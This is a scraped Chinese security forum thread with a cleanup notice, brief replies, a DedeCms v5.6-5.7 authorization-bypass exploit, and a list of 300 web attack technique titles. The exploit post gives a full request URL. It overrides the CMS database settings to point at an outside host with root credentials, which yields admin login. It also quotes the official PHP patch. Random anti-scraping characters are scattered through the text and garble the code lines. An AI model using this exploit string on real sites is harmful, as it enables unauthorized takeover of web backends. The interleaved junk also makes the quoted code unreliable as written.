最近看过此主题的会员

返回列表 发帖

论坛内容及无效ID将进行一次清理

由于论坛近段时间疏于管理、再加上各种和谐压力,交流气氛也不如从前。所以有必要进行一次清理。望大家理解!

 

您可能还想看的主题:

新人报道!

最全最完美的黑链代码写法大全

Asprain论坛注册用户上传图片漏洞

优蛋 /115网盘专用下载工具/ V2.1.11.126 简体绿色版

来过

最近一直在闭门修行。。所以一直没上,今天有时间发一个贴 证明存在

Nginx配置文件详解

最近神马的论坛 神马的QQ群有木有蛋疼的家伙?

【原创首发】每天就我一个人,我会孤单的

分享你的行业见闻,快速获得非安全中积分及邀请码

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

早该做了

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

/抠鼻  大叔不许把我的小马甲给清了。。。
讨厌啊,姐才不是圈内人呢~

TOP

织梦(DedeCms) v5.6-5.7 越权访问漏洞
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
/ O6 Z- e+ j* ~8 v0 R
把上面validate=dcug改为当前的验证码,即可直接进入网站后台

8 k0 X- c$ w9 e9 V$ Z, @8 f) n
此漏洞的前提是必须得到后台路径才能实现

+ K" F/ @+ r' m8 }
官方临时解决办法:
1 S" E& z% ]/ {/ p& I5 X" e+ L* x
找到include/common.inc.php文件,把:
2 D7 [; f+ r6 r' w- @: q8 }
    foreach($_REQUEST as $_k=>$_v)
* w+ W0 W! \! M/ T' X" [    {! W1 j! w0 H& e+ L# f6 P
        var_dump($_k);$ H) I+ B* f; k- D: |: A. ~
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )2 B6 g$ c+ _2 l6 E" K
        {
* `+ A+ z$ L- X0 C, Q9 _1 V            exit('Request var not allow!');
1 s# o0 a1 J; ^4 v        }
9 d9 Z0 B0 s6 |    }

- H) W" p  i! i0 v* M# q# e& Y
换成:
' U. Q0 [( A4 [. I
    //检查和注册外部提交的变量
1 B" b# C: ^8 |4 P! p    function CheckRequest(&$val) {! C" A" Z! {% ]) X+ [4 b& g) E
        if (is_array($val)) {
5 u5 C' R) H6 `) l7 W5 E$ K8 h( r            foreach ($val as $_k=>$_v) {( F' I* g0 ~" S0 m- q8 ]
                CheckRequest($_k);
7 \% K* [) f" N8 F9 N5 \! m                CheckRequest($val[$_k]);4 {5 R- M# @8 C: _
            }
+ P. N2 C. r2 X8 @- @; p        } else
& \1 q# y" C! S0 r3 J: w        {1 n1 P$ T* _' n# S/ z" W* n
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) ); M9 h% Z% W* H$ }
            {
& l! i* U( k* D                exit('Request var not allow!');% o" W& G) f6 r4 x" _* Z4 ]
            }
2 `" Z$ n/ _- q8 _0 n4 [        }1 t9 P2 p1 a" Z* T" t* g2 n( o
    }
: J" f1 ?1 g2 k: j( p& z) n    CheckRequest($_REQUEST);
) P5 [1 S% }" w6 e

, }1 G" V0 W# Z0 j9 H6 A
/ K2 h5 n1 ?5 [' u' S  ~- v. G" z- B' M# [
( M6 N7 R; C6 d4 d/ L' R
0 q# [8 E* S3 k* q8 ^& L

: _6 J/ w7 q/ I* M
# t7 m% o% D( a, S2 K( v1 W" }0 j, n. T. e4 @3 o
# r5 j! ~) a5 W! b

# L. D- L  B! H- T7 q- ^' B& ^- s- W/ Q: ?2 G% ^" Y5 T" q
# l5 ]0 d1 y4 O0 a
0 {$ N  X* Y9 M

" q3 X: K4 i! I7 o6 Q
+ K1 y7 O) L: `8 h6 N& H9 K% G; U. y8 Y& v+ l1 b: `0 [

8 G0 {: {8 g& s
( ~/ s" |* x1 g- P. }  W& U/ G) l) g$ A6 g
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

(2006-2009)300个攻击技术总结
(2006:1-65 | 2007:66-148 | 2008:149-218 | 2009:219-300) 300种思路,300个变通思维。部分文章需翻墙看。9 y5 K/ |( n; m9 Q4 m
1.The Attack of the TINY URLs
: o. {1 M' T1 J2.Backdooring MP3 Files! ?) S& Z8 V+ s8 U/ x
3.Backdooring QuickTime Movies
0 V. `& h* O) \3 s5 Y. @4.CSS history hacking with evil marketing
0 T% c# S2 ^+ ?9 L- g5.I know where you've been
( A7 \+ `' S8 N$ [$ i; h3 q+ b2 @0 b6.Stealing Search Engine Queries with JavaScript) @9 \5 `6 R" F2 D: O" F
7.Hacking RSS Feeds
% i& W% ]7 k* T& |0 e# V8.MX Injection : Capturing and Exploiting Hidden Mail Servers  q7 }2 C7 `- f
9.Blind web server fingerprinting
5 h6 e! |4 b0 L- j, ]0 E- N10.JavaScript Port Scanning8 ^: D. w# a. r5 X4 R8 Z
11.CSRF with MS Word, {: ]7 e! ~# u) k7 `3 v1 c
12.Backdooring PDF Files
$ C' n/ b2 Q8 M" I13.Exponential XSS Attacks
) H* a( i& `2 J- [. d14.Malformed URL in Image Tag Fingerprints Internet Explorer! h- `$ v( H, Y- b# C
15.JavaScript Portscanning and bypassing HTTP Auth+ A- ]( \. R# [, K! d! @
16.Bruteforcing HTTP Auth in Firefox with JavaScript4 E' z3 m# T% _) _0 s" s
17.Bypassing Mozilla Port Blocking. L, e' ?9 ~& `2 x
18.How to defeat digg.com5 I$ [# X. {9 E# h6 Y/ [
19.A story that diggs itself
& w! z  s: Y1 T$ ~0 q20.Expect Header Injection Via Flash
# @% e. j4 k* ]8 g# C5 }" V21.Forging HTTP request headers with Flash6 c: {; J7 Y7 W0 ~. Z5 W
22.Cross Domain Leakage With Image Size+ D4 f3 [/ L" ?5 y2 C5 v
23.Enumerating Through User Accounts
$ O$ O$ r8 I. a8 |2 O# `: s24.Widespread XSS for Google Search Appliance
! T" h' P% ?& A( D25.Detecting States of Authentication With Protected Images
" W2 ]# |; A8 j6 P+ a26.XSS Fragmentation Attacks' w; M0 w3 N3 @; R
27.Poking new holes with Flash Crossdomain Policy Files0 @6 @4 w2 ]2 s% z
28.Google Indexes XSS
9 V/ Z2 r; p6 |6 t0 v; I& R29.XML Intranet Port Scanning/ a0 p5 I4 a" \( X
30.IMAP Vulnerable to XSS
" f- @$ W6 p* R; E31.Detecting Privoxy Users and Circumventing It4 W2 f1 R2 g5 B
32.Using CSS to De-Anonymize
. ^. ^) E% t; A- c1 R- \" `33.Response Splitting Filter Evasion
9 T: l0 f9 r+ T4 }+ _34.CSS History Stealing Acts As Cookie
& T; u" S& a( I$ C2 z7 W' s) l35.Detecting FireFox Extentions
! }8 A6 N+ A0 G: a# _8 l8 W8 Z5 i36.Stealing User Information Via Automatic Form Filling, y7 U8 ]: C1 f9 x( _
37.Circumventing DNS Pinning for XSS7 u& {- x2 P) C: |' z
38.Netflix.com XSRF vuln
/ Z: R8 s% _5 `39.Browser Port Scanning without JavaScript
. f" m5 v( L9 ~8 U: H* E# p40.Widespread XSS for Google Search Appliance
5 m+ Z0 B1 u2 H' |41.Bypassing Filters With Encoding
( p# s3 I+ G6 ^0 Z8 g; j, @( y42.Variable Width Encoding
0 t' P! q9 z% Y& z( q/ l2 \43.Network Scanning with HTTP without JavaScript  \3 e: C- w3 ^! @; K' P% {
44.AT&T Hack Highlights Web Site Vulnerabilities , ?2 ~9 R+ r0 i. X6 Q4 y
45.How to get linked from Slashdot& a# K/ h$ D4 S8 G
46.F5 and Acunetix XSS disclosure# x& ~3 d. F) Q, q( e- Z
47.Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
5 L+ D+ [; U- z3 U# n# \( K/ W6 U48.Google plugs phishing hole+ }0 j6 J- c1 Q0 ?+ A
49.Nikon magazine hit with security breach& Y" O& r; C: n+ a
50.Governator Hack
  n' v( f8 f+ ?: K51.Metaverse breached: Second Life customer database hacked
  y0 {7 q. z: `% r52.HostGator: cPanel Security Hole Exploited in Mass Hack
% }& ?4 `; R: {) [53.Firefox Extensions
9 c# ~5 D& @2 @) |0 \54.ABC News (AU) XSS linking the reporter to Al Qaeda
* C4 N5 B! m0 [1 J8 r# f55.Account Hijackings Force LiveJournal Changes! f" Y- P$ b) g0 P! U
56.Xanga Hit By Script Worm
' a  \8 p8 z/ @( C57.Advanced Web Attack Techniques using GMail' _+ k4 q/ A  @
58.PayPal Security Flaw allows Identity Theft& V( S1 E+ W) L7 V- w8 @3 A
59.Internet Explorer 7 "mhtml:" Redirection Information Disclosure
' o5 ~* Q5 c2 M/ `, E60.Bypassing of web filters by using ASCII 9 {( x( Z: p3 z( ~, p! p
61.Selecting Encoding Methods For XSS Filter Evasion
/ {8 y+ x( m$ _1 H* S. t, ?62.Adultspace XSS Worm/ t  P! Y# _! _  |/ M( m" E
63.Anonymizing RFI Attacks Through Google7 x* A" s. R8 L; @0 O: r. P
64.Google Hacks On Your Behalf
# w5 _  |7 C6 H% b6 v! r65.Google Dorks Strike Again
& r7 y/ l- o, {* }: \' _66.Cross-Site Printing 7 I: B" f( [  w
67.Stealing Pictures with Picasa
8 m9 Z  ]8 F0 ~9 D6 T4 w* G; s68.HScan Redux1 Y6 g( Z1 b7 ?+ ~3 D
69.ISO-8895-1 Vulnerable in Firefox to Null Injection6 F& j- \% M$ J" _9 p5 F) x
70.MITM attack to overwrite addons in Firefox9 L/ Z% C' ^# ?0 }" G" V, _
71.Microsoft ASP.NET Request Validation Bypass Vulnerability
( P/ s2 D+ ~2 y9 |4 l+ W( p% ?4 B- Q3 `72.Non-Alpha-Non-Digit 3
4 }& D& m) V) |  p73.Steal History without JavaScript" X; a* g6 }, o9 G  U2 D  c; W
74.Pure Java??, Pure Evil?? Popups, b) ^) p; h* v
75.Google Adsense CSRF hole
. R; s% K' `" P2 M8 C; G76.There’s an OAK TREE in my blog!?!?!
+ b! n) R+ Y4 D# p6 j77.BK for Mayor of Oak Tree View
+ K+ g7 t! b+ T% z: R. W78.Google Docs puts Google Users at Risk9 K7 W3 |, l8 `! l
79.All Your Google Docs are Belong To US…
, [* k2 S/ n+ X' ]80.Java Applets and DNS Rebinding
7 ^( Q' R( y3 X( D' G; M: w  ^: t  y5 h81.Scanning internal Lan with PHP remote file opening.
) q  r: b3 I  I. r$ M& r' U" S2 O: Z2 p82.Firefox File Handling Woes3 G" K* W4 v, y% R6 m: o
83.Firefoxurl URI Handler Flaw
3 k0 M! D' a1 p" y: w' G0 H84.Bugs in the Browser: Firefox’s DATA URL Scheme Vulnerability" V) g# p& J3 f" ?3 l! ?
85.Multiviews Apache, Accept Requests and free listing# w! x+ K1 E) A5 A
86.Optimizing the number of requests in blind SQL injection
7 f/ z  ?% ?5 c87.Bursting Performances in Blind SQL Injection - Take 2
- O& E7 }9 Y6 T' R. U88.Port Scan without JavaScript+ F/ O: q9 I, p% s
89.Favorites Gone Wild$ A9 ~. P$ a5 L) b% Q# t- q
90.Cross-Browser Proxy Unmasking, s7 u$ c8 u3 k6 w* V; d
91.Spoofing Firefox protected objects
0 q- |" l% \$ V' x6 `7 ^; \92.Injecting the script tag into XML
3 ^. S" H3 n& j) m2 S, I93.Login Detection without JavaScript
9 [1 U4 C) j6 l! L1 u9 @" x8 t1 G! O2 b94.Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration
8 u# \8 P: }. R95.Username Enumeration Timing Attacks : ?, V( u. |0 \/ z
96.Google GMail E-mail Hijack Technique
- t. n+ I" B) C! n& |$ u97.Recursive Request DoS2 Z# e2 D) p! P7 Z0 R
98.Exaggerating Timing Attack Results Via GET Flooding
$ V* Z3 Y* K% c: A0 ]99.Initiating Probes Against Servers Via Other Servers
4 N$ e! }, N) }( S# S  ]2 F# I100.Effects of DNS Rebinding On IE’s Trust Zones
8 @$ f: Z6 P+ P' n" |5 P101.Paper on Hacking Intranets Using Websites . v7 U9 u: _- }& g3 V; t! _
102.More Port Scanning - This Time in Flash
+ ?  s6 m9 h- w. E+ O' Y103.HTTP Response Splitting and Data: URI scheme in Firefox# V6 d; l! }5 O2 q* g% ?
104.Res:// Protocol Local File Enumeration
' m& D& A3 n) a) t0 K  A105.Res Timing Attack: r+ n- W( ~# t0 u+ v1 F
106.IE6.0 Protocol Guessing6 H: \  Z1 k5 `7 y
107.IE 7 and Firefox Browsers Digest Authentication Request Splitting
) Q, |' R' z2 t' ]( ?108.Hacking Intranets Via Brute Force
. f' p0 I0 H. p3 `" X% T109.Hiding JS in Valid Images2 v- g- p# F+ F; f0 {( I4 q7 |
110.Internet Archiver Port Scanner
# o+ ~8 H# v4 @) {$ Q  E/ p  D/ _111.Noisy Decloaking Methods
0 @2 O  a# v' V; ?' Y4 n2 k112.Code Execution Through Filenames in Uploads
* U' ]/ F. M0 _1 \  s7 e/ W113.Cross Domain Basic Auth Phishing Tactics
5 Z3 k- S! }% s. F114.Additional Image Bypass on Windows
7 I: ?$ _( G* h1 d+ K7 A115.Detecting users via Authenticated Redirects
! \  ^/ h, n3 H/ l+ k0 e- @: d116.Passing Malicious PHP Through getimagesize()
1 A5 [2 m( D* `) t1 l7 A117.Turn Any Page Into A Greasemonkey Popup
# ~- \. \0 ?  x4 V# \118.Enumerate Windows Users In JS
1 N, h4 z; `1 ^9 [119.Anti-DNS Pinning ( DNS Rebinding ) + Socket in FLASH8 o2 x$ l! n' |) q" Y! L) b
120.Iframe HTTP Ping* s! L! t- f: K2 c5 d, W  f& I
121.Read Firefox Settings (PoC)4 u: e2 A- q" ^$ a# g$ a2 ]$ f
122.Stealing Mouse Clicks for Banner Fraud
/ H" l; e/ S$ j  P123.(Non-Persistent) Untraceable XSS Attacks" g1 X, \& o5 N7 W/ a
124.Inter Protocol Exploitation
: g# l* V/ T# g3 q: ]4 p; |! X125.Detecting Default Browser in IE1 `: p$ A' k; [4 [, w, [
126.Bypass port blocking in Firefox, Opera and Konqueror.
+ F3 M- Q; B) w6 ^2 x# g127.LocalRodeo Detection
, i* a* U/ T7 P( a7 @128.Image Names Gone Bad
$ q" ?) _* r! C& U7 F4 @" N129.IE Sends Local Addresses in Referer Header
$ ^0 }' F' R( f% K4 u130.PDF XSS Can Compromise Your Machine) W" b# t! j$ W( F+ i& l; h3 J
131.Universal XSS in Adobe’s Acrobat Reader Plugin5 V9 Q% r3 M  D  A
132.Firefox Popup Blocker Allows Reading Arbitrary Local Files& T7 k/ }3 ?0 t/ h
133.IE7.0 Detector' |- a! w" y& o3 S1 Y
134.overwriting cookies on other people’s domains in Firefox.2 O, y0 |9 S, f
135.Embeding SVG That Contains XSS Using Base64 Encoding in Firefox5 l; w# ]# Y+ i3 v, ^( \
136.Firefox Header Redirection JavaScript Execution' g- p  h0 d& \( x/ v
137.More URI Stuff… . C: d% j4 w# O6 F. U$ `  H8 x
138.Hacking without 0days: Drive-by Java
, C8 \& @, c. r4 v139.Google Urchin password theft madness8 D% P2 [/ R/ c  k# c# F! |
140.Username Enumeration Vulnerabilities, {+ t) T$ J) Z4 P
141.Client-side SQL Injection Attacks
% G4 _$ ~* U: U; h+ B1 Z, T4 i142.Content-Disposition Hacking
$ c" Y2 p% w) V5 A+ D143.Flash Cookie Object Tracking: n0 l9 [' v" ^3 C7 `
144.Java JAR Attacks and Features
  A1 a& U) g, f( e145.Severe XSS in Google and Others due to the JAR protocol issues
" v. Q$ i* m0 D5 Y, {146.Web Mayhem: Firefox’s JAR: Protocol issues 1 o- ]3 ^- Y, l. x3 B
147.0DAY: QuickTime pwns Firefox& z8 j& |: K$ o) G* Q# F+ R& Y
148.Exploiting Second Life; e0 c  ]0 U; W" J
149.CUPS Detection
& ?7 ?+ d! N( ^' B: S5 o5 o4 R* `4 J150.CSRFing the uTorrent plugin
3 S# t0 ~4 A; t4 Y. l151.Clickjacking / Videojacking7 i" x, s7 z. [, l/ u
152.Bypassing URL Authentication and Authorization with HTTP Verb Tampering
4 }5 k; S! H  c3 x153.I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)( s0 W9 F6 `; M3 n  F3 }
154.Safari Carpet Bomb
# j: z0 i( v6 G* X  T! G* I155.Flash clipboard Hijack
- N% @) E2 h% ^' v# V8 b156.Flash Internet Explorer security model bug
8 @; t' `. {! v" b% Q157.Frame Injection Fun
& W8 a# w. X$ Y158.Free MacWorld Platinum Pass? Yes in 2008!
6 v4 Q3 a& G- V5 o2 H, b- c) t159.Diminutive Worm, 161 byte Web Worm3 R( u0 u0 U& a- \# A- j. a
160.SNMP XSS Attack (1)
2 c. D, b4 g3 U% C) v161.Res Timing File Enumeration Without JavaScript in IE7.0
% k6 `0 B/ J' `- S  N8 Y( a# w162.Stealing Basic Auth with Persistent XSS! b  {0 z' S4 ]  `6 _2 h
163.Smuggling SMTP through open HTTP proxies
& |4 M$ j% ^7 y" a! ^, H: ]164.Collecting Lots of Free 'Micro-Deposits'" e+ T( C5 M9 m9 r6 x  e
165.Using your browser URL history to estimate gender- ^. W! y$ m! j3 \9 Q
166.Cross-site File Upload Attacks
/ _0 `: v+ B( S# H3 x167.Same Origin Bypassing Using Image Dimensions, b1 z3 y& B& s6 W' @
168.HTTP Proxies Bypass Firewalls. u/ x* J, `. J0 P. l
169.Join a Religion Via CSRF
/ |! X' E+ u" @# D7 r" C170.Cross-domain leaks of site logins via Authenticated CSS
/ X) s6 X( Y9 i3 m  A. R171.JavaScript Global Namespace Pollution
2 [- e$ c# n7 w' {! `( [/ K& q- x172.GIFAR+ v' U" |; X1 d5 r  b
173.HTML/CSS Injections - Primitive Malicious Code6 U$ n# L0 Z4 d4 c6 Z( l7 c1 _6 P4 Z
174.Hacking Intranets Through Web Interfaces
. `5 f. K6 r1 V6 F. @# s- J& r5 g; i175.Cookie Path Traversal
. N; n! D, A# R$ [' v176.Racing to downgrade users to cookie-less authentication
. {5 e) M6 A: k. X. L# [177.MySQL and SQL Column Truncation Vulnerabilities
( o9 [3 W* y  c5 q# W178.Building Subversive File Sharing With Client Side Applications$ ~: u* S: o& }* y
179.Firefox XML injection into parse of remote XML
- F; p7 g) j, v9 m9 d5 S180.Firefox cross-domain information theft 9 z8 B/ w% A2 m" G5 _# h
181.Firefox 2 and WebKit nightly cross-domain image theft
4 J7 n- [- k8 q9 s( \182.Browser's Ghost Busters
2 A( u2 `6 ^+ `! V* `183.Exploiting XSS vulnerabilities on cookies+ l$ f& _: ^5 Z& H
184.Breaking Google Gears' Cross-Origin Communication Model! l" f- j7 j! w( K
185.Flash Parameter Injection* l! J  R9 X# z3 f. Y1 Z
186.Cross Environment Hopping
6 @( y6 A0 M8 @) v( r- y187.Exploiting Logged Out XSS Vulnerabilities
4 A1 @$ N1 [8 J188.Exploiting CSRF Protected XSS  c( t7 e# Q4 K, y& ]
189.ActiveX Repurposing, (1, 2): O, X5 E5 k" E0 I8 U' J
190.Tunneling tcp over http over sql-injection
0 L! Y  B; ^3 O2 H8 N1 |! M191.Arbitrary TCP over uploaded pages
- W9 g/ o' k  @: P! n6 ]192.Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
. m' F7 ~- K- e& B; V193.JavaScript Code Flow Manipulation
' d0 E" h+ M8 B) ]# _194.Common localhost dns misconfiguration can lead to "same site" scripting
+ k$ l: x4 h0 a3 F/ V195.Pulling system32 out over blind SQL Injection
  x0 \& ~% S& d6 e, q196.Dialog Spoofing - Firefox Basic Authentication) |  ]3 f* z! R. u
197.Skype cross-zone scripting vulnerability/ D/ T1 |; {: U. c# A9 R, S5 W
198.Safari pwns Internet Explorer% i/ e% m" e9 E9 d7 M
199.IE "Print Table of Links" Cross-Zone Scripting Vulnerability7 l0 h) B" o, M7 @5 o$ T# P6 M
200.A different Opera
3 |# y3 n( ~3 M& ~201.Abusing HTML 5 Structured Client-side Storage
: h7 a% L+ ]% n5 q$ A202.SSID Script Injection7 s, d. A, V/ a0 o2 S8 {
203.DHCP Script Injection; U, K* X0 ]+ \3 U7 L
204.File Download Injection
+ J7 G! @( F0 f2 L7 ~/ ^5 ~205.Navigation Hijacking (Frame/Tab Injection Attacks); \; x8 \7 g' P+ d6 ]
206.UPnP Hacking via Flash
' v; S9 i( l  L* U$ |; `207.Total surveillance made easy with VoIP phone
8 K% K# z' F3 q) L- D208.Social Networks Evil Twin Attacks3 g- l7 D: m* h# P# e0 v* v+ `
209.Recursive File Include DoS( e/ N0 ?# U  y9 K( [7 v
210.Multi-pass filters bypass, u( Y0 r; Q+ W0 j$ K8 r
211.Session Extending
4 ]+ X& D5 u2 D' A  P* u# U212.Code Execution via XSS (1) * Z) c: m8 v9 h
213.Redirector’s hell4 X" o1 d. L$ m9 p+ ^' Y* D5 A( ?
214.Persistent SQL Injection5 x4 |; \2 V% ~) z& |9 O
215.JSON Hijacking with UTF-7# e* u$ e1 J! o: B% e) s% P- t1 \
216.SQL Smuggling
& U: p6 F& b  x8 |/ v& j217.Abusing PHP Sockets (1, 2)
. ?) ^) M2 D- @. `+ a; k- {218.CSRF on Novell GroupWise WebAccess' G3 F6 L2 s2 s! B8 q  {2 {' {' _5 c
219.Persistent Cookies and DNS Rebinding Redux
9 s3 X! [- T7 M6 L3 x  S: d4 G, O7 p2 c220.iPhone SSL Warning and Safari Phishing
4 x0 a# j8 v. y9 K$ J1 @$ ~221.RFC 1918 Blues" A5 d: E& A; @6 g
222.Slowloris HTTP DoS
) r4 B1 h" [7 w# a223.CSRF And Ignoring Basic/Digest Auth
: ?5 w0 f1 P& E7 Z224.Hash Information Disclosure Via Collisions - The Hard Way
1 T6 ~& T& w: a; L4 L& d* {225.Socket Capable Browser Plugins Result In Transparent Proxy Abuse
# j5 o( K9 q  G4 O! J5 K226.XMLHTTPReqest “Ping” Sweeping in Firefox 3.5+$ H: g: @, p( ~" E+ R: R
227.Session Fixation Via DNS Rebinding
4 c, y0 F$ p2 J$ S6 m# ]228.Quicky Firefox DoS
7 j* c  f! D! ?5 E1 p' O8 I229.DNS Rebinding for Credential Brute Force8 {1 C8 L& |$ A7 ~
230.SMBEnum5 }/ D$ B2 G, K) K+ y- m
231.DNS Rebinding for Scraping and Spamming
' L- M* @6 X: X! P- @; p- V; J232.SMB Decloaking
- c7 o3 o) A, P: I5 O" H- O; F233.De-cloaking in IE7.0 Via Windows Variables
- D( F$ {. |% M0 q234.itms Decloaking
# ^$ H6 _! A  E6 z235.Flash Origin Policy Issues) A1 d% T7 f/ ]& T+ t5 @, {
236.Cross-subdomain Cookie Attacks
/ N, I7 h  @( A! a+ r: r  d& r5 _237.HTTP Parameter Pollution (HPP)
8 Z" y  o5 S( Y# Q: \( i2 L5 F238.How to use Google Analytics to DoS a client from some website.0 n+ I) {( B) a5 L# s, ^
239.Our Favorite XSS Filters and how to Attack them
( [$ ~% n! U6 k240.Location based XSS attacks
2 ]1 N3 K: n. v: t' b3 @241.PHPIDS bypass0 W+ T8 [7 ?! F
242.I know what your friends did last summer
! ?! Q% o' B4 g: H, r1 h! i: m, _! r243.Detecting IE in 12 bytes
4 z3 ?6 G; Z% R4 @/ s5 g244.Detecting browsers javascript hacks
5 w4 @& |: @8 W8 ~) l1 T' o( O- y5 X245.Inline UTF-7 E4X javascript hijacking
  X* v  }; s9 r! w( S( O, |246.HTML5 XSS8 Z8 H* B2 k9 r, z3 ^9 {2 v
247.Opera XSS vectors  Q0 v3 [1 _4 y# b" P2 S. `
248.New PHPIDS vector; n( M, m! i$ S5 z# ^3 v
249.Bypassing CSP for fun, no profit
0 r: m7 y) S6 L# N  x, e, ^2 l! }250.Twitter misidentifying context/ M0 W% c8 m& T! I5 P( l1 R$ K
251.Ping pong obfuscation; x% `7 y0 Y5 m
252.HTML5 new XSS vectors
5 e5 M4 \: F0 i3 c253.About CSS Attacks$ G$ |* ^! Z1 m# I  ?( E
254.Web pages Detecting Virtualized Browsers and other tricks * x' z0 w: B  B: F; ~: ^
255.Results, Unicode Left/Right Pointing Double Angel Quotation Mark / a* d! Q& F$ S) b
256.Detecting Private Browsing Mode 4 B+ N* Z7 d0 F# K
257.Cross-domain search timing
7 N; |9 [9 y9 u( i258.Bonus Safari XXE (only affecting Safari 4 Beta)
5 T5 D0 ~5 d6 t# D+ A- ^( ^/ p8 r259.Apple's Safari 4 also fixes cross-domain XML theft) j2 f% ?! G' s( k
260.Apple's Safari 4 fixes local file theft attack
# x+ o) B* H! J, _$ s' J8 w261.A more plausible E4X attack
3 o3 V  W; O! `" u+ {* v# r262.A brief description of how to become a CA7 A# [& j3 v" }) C% ?
263.Creating a rogue CA certificate
- x. k; f5 k8 e264.Browser scheme/slash quirks 2 `# k4 o- x! f5 M4 J
265.Cross-protocol XSS with non-standard service ports2 R" u1 ^( S' @2 M8 W! F0 d
266.Forget sidejacking, clickjacking, and carjacking: enter “Formjacking”
- x3 s3 u( S4 E  j267.MD5 extension attack
2 B) q5 v( `4 X- m" _" |. x268.Attack - PDF Silent HTTP Form Repurposing Attacks- [9 q; k" Q2 \  o0 O' L( D
269.XSS Relocation Attacks through Word Hyperlinking
7 {6 H( @% Y, A* O) }" R3 ~! U270.Hacking CSRF Tokens using CSS History Hack
9 _7 K& j; l3 ~+ }271.Hijacking Opera’s Native Page using malicious RSS payloads# N/ O  G1 S! o
272.Millions of PDF invisibly embedded with your internal disk paths3 n2 ?+ P8 l& ?0 I
273.Exploiting IE8 UTF-7 XSS Vulnerability using Local Redirection( ?8 g- k# r+ ~( j. ]. y" e
274.Pwning Opera Unite with Inferno’s Eleven
0 ?9 S( G4 V( V/ i275.Using Blended Browser Threats involving Chrome to steal files on your computer
  ?1 a  K' J1 \! r% t% m9 C. J276.Bypassing OWASP ESAPI XSS Protection inside Javascript
. K. t/ u/ w) Q% K1 ^7 y3 k277.Hijacking Safari 4 Top Sites with Phish Bombs
* F7 w! H, _7 ?/ C0 o2 ~2 I+ p278.Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency
# V. Y. Z; P5 H3 s+ y2 q279.Gmail - Google Docs Cookie Hijacking through PDF Repurposing & PDF
& V- [0 X5 [0 m; N280.IE8 Link Spoofing - Broken Status Bar Integrity
8 T6 ?( _# w; l, A" _" K% b281.Blind SQL Injection: Inference thourgh Underflow exception
6 O. R7 q( [* b. G282.Exploiting Unexploitable XSS9 Z- L# k+ d  \. D
283.Clickjacking & OAuth6 W5 z$ ~! y' Q+ K+ G% F
284.Google Translate - Google User Content - File Uploading Cross - XSS and Design Stringency - A Talk
/ q" H; E* l7 A' D; d285.Active Man in the Middle Attacks
' e, P( p, S; i' D6 ~& E' W3 h286.Cross-Site Identification (XSid)) H: _! G. b! F7 |* J$ f6 I, e7 o
287.Microsoft IIS with Metasploit evil.asp;.jpg/ Z# x$ k# e4 r2 k+ u3 t
288.MSWord Scripting Object XSS Payload Execution Bug and Random CLSID Stringency1 b$ L1 {5 Y* R) @4 G; i; v6 v- Z1 q; O
289.Generic cross-browser cross-domain theft1 O3 m6 ^7 u* P) K$ t$ O0 R- _6 H
290.Popup & Focus URL Hijacking
7 D6 U7 S- l, y. x291.Advanced SQL injection to operating system full control (whitepaper) . z3 b6 R( |! c, H' Q7 Q
292.Expanding the control over the operating system from the database
4 j3 E: q- R# Q' w% {$ Y% u1 b7 E293.HTML+TIME XSS attacks
  s2 T$ i5 b: G+ U+ e+ z% `5 _& O294.Enumerating logins via Abuse of Functionality vulnerabilities
6 E$ Z" r" A$ Y. B9 v. C0 |: g7 w295.Hellfire for redirectors
# b6 ^" U/ D# y$ x7 _3 a296.DoS attacks via Abuse of Functionality vulnerabilities/ i6 J% A' m& J1 P; g( f
297.URL Spoofing vulnerability in bots of search engines (#2)
2 e% l8 _8 g0 E% [: H" ]) ~/ d298.URL Hiding - new method of URL Spoofing attacks
# z* w# c6 A3 j299.Exploiting Facebook Application XSS Holes to Make API Requests) q2 Z! Y" q/ m* ^  Z
300.Unauthorized  TinyURL URL Enumeration Vulnerability& t6 A' i. q0 X5 F& s$ h
& ~  n( g1 U, O( p$ ^
+ o  @' S& C0 S& @% e! n
6 K) `3 U& x: X: z, y/ ~# ]8 V
! C8 @' p! I% P' y$ R- \

  w* D: N! ]8 d$ l. Q. j1 [3 s/ T
) }9 ?4 {* H1 _7 z0 ~8 {2 Q

) X$ ?$ t' M% v4 i& F3 C6 z' `' J3 z  [) d2 y' z5 l
) `0 E6 B  q- u( R6 T

; n2 t! A1 q" @" ~' w% r/ f9 [$ x1 z& z
- M3 m' X# k% W6 h4 y+ W+ I( R) \
8 M4 V, O5 b4 K
/ D: v7 v, D0 m  k/ M/ C: N
" }+ B9 G: Q* `! q9 f& w! W  V

5 U) A0 Q2 E, R* Q5 P+ f$ y0 X! U" t7 P* y' b
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表